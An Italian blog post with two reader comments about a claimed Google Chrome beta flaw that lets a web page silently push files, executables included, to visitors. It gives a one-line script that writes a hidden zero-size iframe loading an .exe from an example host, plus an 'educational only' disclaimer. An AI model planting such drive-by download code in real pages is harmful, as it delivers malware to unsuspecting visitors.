Il famoso Web browser sviluppato da Google, permette ad un ipotetico “hacker” di scaricare automaticamente qualsiasi tipo di file (eseguibili compresi) sul computer della persona che visita la sua pagina web progettata ad hoc.

Basta inserire nella pagina web il seguente codice:

<script> document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">'); </script>

dove http://www.example.com è il dominio del sito sviluppato dall’ hacker.

Lo script è stato testato su Windows Vista SP1 e Windows XP SP3 con Google Chrome (BETA).

ATTENZIONE!

Il codice è stato creato solo per fini educativi.
Usate il codice a vostro rischio e pericolo.
L’autore non è responsabile dei danni causati dal suo impiego.

2 Commenti

  1. Cominciamo bene… dopo la bufala Safari di qualche mese fà (il più veloce browser del mondo… nel senso che andava in crash in 30 secondi) ora anche questa di Google Chrome. Avanti così, verso altre inimitabili (dis)avventure…

  2. mah, forse definirlo bug è un po’ eccessivo…

    è una scelta di google che per default non chiede conferma per iniziare il download di un file, se cambiamo l’impostazione ci verrà chiesto conferma proprio come gli altri browser

    inoltre il download è visualizzabile nella barra in basso proprio come gli altri e l’animazione al termine con la frecciona blu non lo fa certamente passare inosservato!